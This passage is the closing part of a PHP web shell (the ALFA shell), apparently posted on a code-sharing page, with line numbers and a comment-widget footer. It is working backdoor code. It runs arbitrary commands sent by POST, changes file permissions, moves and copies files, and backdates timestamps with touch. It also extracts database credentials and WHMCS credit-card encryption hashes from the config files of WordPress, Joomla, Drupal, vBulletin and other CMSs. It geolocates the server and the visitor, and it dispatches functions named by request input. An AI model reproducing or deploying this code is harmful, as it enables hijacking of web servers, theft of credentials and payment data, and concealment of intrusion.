  6073. curl_setopt($process, CURLOPT_POSTFIELDS, $data);
  6074. curl_setopt($process, CURLOPT_POST, 1);
  6075. curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
  6076. }
  6077. $return = @curl_exec($process);
  6078. curl_close($process);
  6079. return $return;
  6080. }
  6081. function error($error) {
  6082. echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>$error</div></center>";
  6083. die;
  6084. }
  6085. }
  6086. function getConfigHtml($cms){
  6087. $content = '';
  6088. $cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb"=>"PHPBB","mybb"=>"MyBB","drupal"=>"Drupal","smf"=>"SMF");
  6089. $content .= "<form class='getconfig' onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value,this.getAttribute(\"base_id\"));return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>";
  6090. foreach($cms_array as $key => $val){
  6091. $content .= "<option value='{$key}' ".($key==$cms?'selected=selected':'').">{$val}</option>";
  6092. }
  6093. $content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='".$_SERVER['DOCUMENT_ROOT']."/' size='30' /> <button class='button'>GetConfig</button>";
  6094. $content .= "</form>";
  6095. return $content;
  6096. }
  6097. if (!function_exists('json_encode')){
  6098. function json_encode($a=false){
  6099. if (is_null($a)) return 'null';
  6100. if ($a === false) return 'false';
  6101. if ($a === true) return 'true';
  6102. if (is_scalar($a))
  6103. {
  6104. if (is_float($a))
  6105. {
  6106. return floatval(str_replace(",", ".", strval($a)));
  6107. }
  6108. if (is_string($a))
  6109. {
  6110. static $jsonReplaces = array(array("\\", "/", "\n", "\t", "\r", "\b", "\f", '"'), array('\\\\', '\\/', '\\n', '\\t', '\\r', '\\b', '\\f', '\"'));
  6111. return '"' . str_replace($jsonReplaces[0], $jsonReplaces[1], $a) . '"';
  6112. }
  6113. else
  6114. return $a;
  6115. }
  6116. $isList = true;
  6117. for ($i = 0, reset($a); $i < count($a); $i++, next($a))
  6118. {
  6119. if (key($a) !== $i)
  6120. {
  6121. $isList = false;
  6122. break;
  6123. }
  6124. }
  6125. $result = array();
  6126. if ($isList)
  6127. {
  6128. foreach ($a as $v) $result[] = json_encode($v);
  6129. return '[' . join(',', $result) . ']';
  6130. }
  6131. else
  6132. {
  6133. foreach ($a as $k => $v) $result[] = json_encode($k).':'.json_encode($v);
  6134. return '{' . join(',', $result) . '}';
  6135. }
  6136. }
  6137. }
  6138. if ( !function_exists('json_decode') ){
  6139. function json_decode($json, $array=true){
  6140. $comment = false;
  6141. $out = '$x=';
  6142. for ($i=0; $i<strlen($json); $i++)
  6143. {
  6144. if (!$comment)
  6145. {
  6146. if ($json[$i] == '{' || $json[$i] == '['){$out .= ' array(';}
  6147. else if ($json[$i] == '}' || $json[$i] == ']'){$out .= ')';}
  6148. else if ($json[$i] == ':'){$out.= '=>';}else {$out .= $json[$i];}
  6149. }
  6150. else $out .= $json[$i];
  6151. if ($json[$i] == '"') $comment = !$comment;
  6152. }
  6153. eval($out . ';');
  6154. return $x;
  6155. }
  6156. }
  6157. function alfaterminalExec(){
  6158. $pwd = "pwd";
  6159. $seperator = ";";
  6160. if($GLOBALS['sys']!='unix'){
  6161. $pwd = "cd";
  6162. $seperator = "&";
  6163. }
  6164. if($GLOBALS["glob_chdir_false"]&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."'".$seperator;}
  6165. $current_path = '';
  6166. if(preg_match("/cd[ ]{0,}(.*)[ ]{0,}".$seperator."|cd[ ]{0,}(.*)[ ]{0,}/i", $_POST['alfa1'], $match)){
  6167. if(empty($match[1])){
  6168. $match[1] = $match[2];
  6169. }
  6170. $current_path = alfaEx("cd ".addslashes($match[1]).$seperator.$pwd);
  6171. $current_path = str_replace("\\", "/", $current_path);
  6172. }
  6173. $out = alfaEx($cmd.$_POST['alfa1'], true);
  6174. $out = htmlspecialchars($out);
  6175. echo json_encode(array("output" => convertBash($out), "path" => $current_path));
  6176. }
  6177. function convertBash($code) {
  6178. $dictionary = array(
  6179. '[01;30m' => '<span style="color:black">',
  6180. '[01;31m' => '<span style="color:red">',
  6181. '[01;32m' => '<span style="color:green">',
  6182. '[01;33m' => '<span style="color:yellow">',
  6183. '[01;34m' => '<span style="color:blue">',
  6184. '[01;35m' => '<span style="color:purple">',
  6185. '[01;36m' => '<span style="color:cyan">',
  6186. '[01;37m' => '<span style="color:white">',
  6187. '[0m' => '</span>'
  6188. );
  6189. $htmlString = str_replace(array_keys($dictionary), $dictionary, $code);
  6190. return $htmlString;
  6191. }
  6192. function alfadoActions(){
  6193. $chdir_fals = false;
  6194. if(!@chdir($_POST['c'])){
  6195. $chdir_fals = true;
  6196. $alfa_canruncmd = _alfa_can_runCommand(true,true);
  6197. }
  6198. if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
  6199. if(isset($_POST['alfa2']))$_POST['alfa2'] = rawurldecode($_POST['alfa2']);
  6200. $action = $_POST["alfa3"];
  6201. if($action == "permission"){
  6202. $perms = 0;
  6203. $perm = $_POST["alfa2"];
  6204. for($i=strlen($perm)-1;$i>=0;--$i){
  6205. $perms += (int)$perm[$i]*pow(8, (strlen($perm)-$i-1));
  6206. }
  6207. if(@chmod($_POST['alfa1'], $perms)){
  6208. echo("done");
  6209. }else{
  6210. echo("no");
  6211. }
  6212. return;
  6213. }
  6214. if($action == "rename" || $action == "move"){
  6215. $alfa1_decoded = $_POST['alfa1'];
  6216. if($chdir_fals){
  6217. $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
  6218. }
  6219. $_POST['alfa1'] = trim($_POST['alfa1']);
  6220. $alfa1_escape = addslashes($_POST["alfa1"]);
  6221. if($_POST["alfa3"] == "rename"){
  6222. $_POST['alfa2'] = basename($_POST['alfa2']);
  6223. }
  6224. if(!empty($_POST['alfa2'])){
  6225. $cmd_rename = false;
  6226. if($chdir_fals&&$alfa_canruncmd){
  6227. if(_alfa_is_writable($_POST['alfa1'])){
  6228. $cmd_rename = true;
  6229. $alfa1_escape = addslashes($alfa1_decoded);
  6230. alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa2'])."'");
  6231. }
  6232. }
  6233. if(!file_exists($_POST['alfa2'])){
  6234. if(@rename($_POST['alfa1'], $_POST['alfa2'])||$cmd_rename){
  6235. echo "done";
  6236. }else{
  6237. echo "no";
  6238. }
  6239. }else{
  6240. echo "no";
  6241. }
  6242. }
  6243. }elseif($action == "copy"){
  6244. if(is_dir($_POST["alfa1"])){
  6245. $dir = str_replace('//', '/', $_POST["alfa1"]);
  6246. $dir = explode('/', $dir);
  6247. if(empty($dir[count($dir) - 1])){
  6248. $name = $dir[count($dir) - 2];
  6249. }else{
  6250. $name = $dir[count($dir) - 1];
  6251. }
  6252. }else{
  6253. $name = basename($_POST["alfa1"]);
  6254. }
  6255. $dir = dirname($_POST["alfa1"]);
  6256. if($dir == "."){
  6257. $dir = $_POST["c"]."/";
  6258. }
  6259. if(is_file($_POST["alfa1"])){
  6260. @copy($_POST["alfa1"], $_POST["alfa2"]);
  6261. echo("done");
  6262. }elseif(is_dir($_POST["alfa1"])){
  6263. if(!is_dir($_POST["alfa2"])){
  6264. mkdir($_POST["alfa2"], 0755, true);
  6265. }
  6266. copy_paste($dir, $name , $_POST["alfa2"] . "/");
  6267. echo("done");
  6268. }
  6269. }elseif($action == "modify"){
  6270. if( !empty($_POST['alfa1']) ) {
  6271. $time = strtotime($_POST['alfa1']);
  6272. if($time){
  6273. $touched = false;
  6274. if($chdir_fals&&$alfa_canruncmd){
  6275. alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa1']))."' '".addslashes($_POST['alfa2'])."'");
  6276. $touched = true;
  6277. }
  6278. if(!@touch($_POST['alfa2'],$time,$time)&&!$touched){
  6279. echo 'no';
  6280. }else{
  6281. echo 'ok';
  6282. }
  6283. } else{
  6284. echo 'badtime';
  6285. }
  6286. }
  6287. }
  6288. }
  6289. function alfaget_flags(){
  6290. $flags = array();
  6291. if(function_exists("curl_version")){
  6292. $curl = new AlfaCURL();
  6293. $server_addr = (!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]);
  6294. $flag = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $server_addr);
  6295. $flag2 = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $_SERVER["REMOTE_ADDR"]);
  6296. if(strpos($flag2, "geoplugin") != false){
  6297. $flag = json_decode($flag, true);
  6298. $flag2 = json_decode($flag2, true);
  6299. if(!empty($flag['geoplugin_countryCode'])){
  6300. $flags["server"]["name"] = $flag['geoplugin_countryName'];
  6301. $flags["server"]["code"] = $flag['geoplugin_countryCode'];
  6302. }
  6303. if(!empty($flag2['geoplugin_countryCode'])){
  6304. $flags["client"]["name"] = $flag2['geoplugin_countryName'];
  6305. $flags["client"]["code"] = $flag2['geoplugin_countryCode'];
  6306. }
  6307. }
  6308. }
  6309. echo json_encode($flags);
  6310. }
  6311. function alfaGetConfig(){
  6312. $cms = $_POST['alfa1'];
  6313. $path = trim($_POST['alfa2']);
  6314. $config = array(
  6315. 'wp'=>array('file'=>'/wp-config.php',
  6316. 'host'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
  6317. 'dbname'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_NAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
  6318. 'dbuser'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_USER(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
  6319. 'dbpw'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
  6320. 'prefix'=>array("/table_prefix[ ]{0,}=[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,};/",1)
  6321. ),
  6322. 'drupal'=>array('file'=>'/config.php',
  6323. 'host'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
  6324. 'dbname'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_DATABASE(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
  6325. 'dbuser'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_USERNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
  6326. 'dbpw'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
  6327. 'prefix'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PREFIX(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1)
  6328. ),
  6329. 'drupal2'=>array('file'=>'/sites/default/settings.php',
  6330. 'host'=>array("/(?:'|\")host(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
  6331. 'dbname'=>array("/(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
  6332. 'dbuser'=>array("/(?:'|\")username(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
  6333. 'dbpw'=>array("/(?:'|\")password(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
  6334. 'prefix'=>array("/(?:'|\")prefix(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1)
  6335. ),
  6336. 'vb'=>array('file'=>'/includes/config.php',
  6337. 'host'=>array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")servername(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
  6338. 'dbuser'=>array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")username(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
  6339. 'dbname'=>array("/config\[(?:'|\")Database(?:'|\")\]\[(?:'|\")dbname(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
  6340. 'dbpw'=>array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")password(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
  6341. 'prefix'=>array("/config\[(?:'|\")Database(?:'|\")\]\[(?:'|\")tableprefix(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3)
  6342. ),
  6343. 'phpnuke'=>array('file'=>'/config.php',
  6344. 'host'=>array('/dbhost(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
  6345. 'dbname'=>array('/dbname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
  6346. 'dbuser'=>array('/dbuname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
  6347. 'dbpw'=>array('/dbpass(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
  6348. 'prefix'=>array('/prefix(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3)
  6349. ),
  6350. 'smf'=>array('file'=>'/Settings.php',
  6351. 'host'=>array("/db_server(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6352. 'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6353. 'dbuser'=>array("/db_user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6354. 'dbpw'=>array("/db_passwd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6355. 'prefix'=>array("/db_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6356. ),
  6357. 'whmcs'=>array('file'=>'/configuration.php',
  6358. 'host'=>array("/db_host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6359. 'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6360. 'dbuser'=>array("/db_username(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6361. 'dbpw'=>array("/db_password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6362. 'cc_encryption_hash'=>array("/cc_encryption_hash(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6363. ),
  6364. 'joomla'=>array('file'=>'/configuration.php',
  6365. 'host'=>array("/\\\$host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6366. 'dbname'=>array("/\\\$db(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6367. 'dbuser'=>array("/\\\$user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6368. 'dbpw'=>array("/\\\$password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6369. 'prefix'=>array("/\\\$dbprefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6370. ),
  6371. 'phpbb'=>array('file'=>'/config.php',
  6372. 'host'=>array("/dbhost(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6373. 'dbname'=>array("/dbname(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6374. 'dbuser'=>array("/dbuser(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6375. 'dbpw'=>array("/dbpasswd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6376. 'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6377. ),
  6378. 'mybb'=>array('file'=>'/inc/config.php',
  6379. 'host'=>array("/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6380. 'dbname'=>array("/config\['database'\]\['database'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6381. 'dbuser'=>array("/config\['database'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6382. 'dbpw'=>array("/config\['database'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6383. 'prefix'=>array("/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6384. )
  6385. );
  6386. if($cms == "drupal"){
  6387. $file = $config[$cms]['file'];
  6388. $file=$path.$file;
  6389. if(@is_file($file)||_alfa_is_dir($file,"-e")){
  6390. }else{
  6391. $cms = 'drupal2';
  6392. }
  6393. }
  6394. if($cms == "vb"){
  6395. $file = $config[$cms]['file'];
  6396. $file=$path.$file;
  6397. if(@is_file($file)||_alfa_is_dir($file,"-e")){
  6398. }else{
  6399. $path .= '/core';
  6400. }
  6401. }
  6402. $data = array();
  6403. $srch_host = $config[$cms]['host'][0];
  6404. $srch_user = $config[$cms]['dbuser'][0];
  6405. $srch_name = $config[$cms]['dbname'][0];
  6406. $srch_pw = $config[$cms]['dbpw'][0];
  6407. $prefix = $config[$cms]['prefix'][0];
  6408. $file = $config[$cms]['file'];
  6409. $chost = $config[$cms]['host'][1];
  6410. $cuser = $config[$cms]['dbuser'][1];
  6411. $cname = $config[$cms]['dbname'][1];
  6412. $cpw = $config[$cms]['dbpw'][1];
  6413. $cprefix = $config[$cms]['prefix'][1];
  6414. if(@is_dir($path)||_alfa_is_dir($path)){
  6415. $file=$path.$file;
  6416. }elseif(@is_file($path)||_alfa_is_dir($path,"-e")){
  6417. $file=$path;
  6418. }else{
  6419. return false;
  6420. }
  6421. $file = __read_file($file);
  6422. if($cms == "drupal2"){
  6423. $file = preg_replace("/\@code(.*?)\@endcode/s", "", $file);
  6424. }elseif($cms == "vb"){
  6425. $file = preg_replace("/right of the(.*?)BAD!/s", "", $file);
  6426. }
  6427. if(preg_match($srch_host, $file, $mach)){
  6428. $data['host'] = $mach[$chost];
  6429. }
  6430. if(preg_match($srch_user, $file, $mach)){
  6431. $data['user'] = $mach[$cuser];
  6432. }
  6433. if(preg_match($srch_name, $file, $mach)){
  6434. $data['dbname'] = $mach[$cname];
  6435. }
  6436. if(preg_match($srch_pw, $file, $mach)){
  6437. $data['password'] = $mach[$cpw];
  6438. }
  6439. if(isset($prefix)){
  6440. if(preg_match($prefix, $file, $mach)){
  6441. $data['prefix'] = $mach[$cprefix];
  6442. }
  6443. }
  6444. if($cms=='whmcs'){
  6445. if(preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)){
  6446. $data['cc_encryption_hash'] = $mach[3];
  6447. }
  6448. }
  6449. echo json_encode($data);
  6450. }
  6451. if(empty($_POST['a']))
  6452. if(isset($default_action) && function_exists('alfa' . $default_action))
  6453. $_POST['a'] = $default_action;
  6454. else
  6455. $_POST['a'] = 'FilesMan2';
  6456. if(!empty($_POST['a']) && function_exists('alfa' . $_POST['a']))
  6457. call_user_func('alfa' . $_POST['a']);
  6458. exit;
  6459. ?>

comments powered by Disqus